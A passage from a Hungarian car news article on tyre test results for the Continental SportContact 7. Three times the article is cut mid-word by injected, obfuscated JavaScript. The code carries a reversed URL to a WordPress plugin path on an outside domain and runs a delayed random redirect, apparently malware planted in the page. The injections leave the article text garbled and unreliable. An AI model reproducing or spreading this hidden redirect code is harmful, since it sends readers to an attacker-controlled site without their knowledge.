Az előző modellhez képest az új SportContact 7 számos tekintetben jobb eredményeket mutat, például a féktávolság vizes útoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton 8%-kal, szárazon pedig 6%-kal csökken. Összességében a vizes, valamint száraz útkörülmények közötti kezelhetőségre és a tapadásra egyaránt jó hatással voltak az új fejlesztések. A tesztet – amelyen győzelmet aratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott az abroncs – egy Toyota Supra segítségével, ultranagy teljesítményű gumiabroncsokkal végezték el: 255/35 R19 (elöl) és 275/35 R19 (hátul). „A nemrég megjelent Continental SportContact 7 új mércét állít fel vizes útviszonyok között, így mindkét teszten hatalmas különbséggel előzte meg a második legjobb abroncsot. A vizes utakon mutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott ekkora fölényének tudatában az új Continental…
- Hirdetés -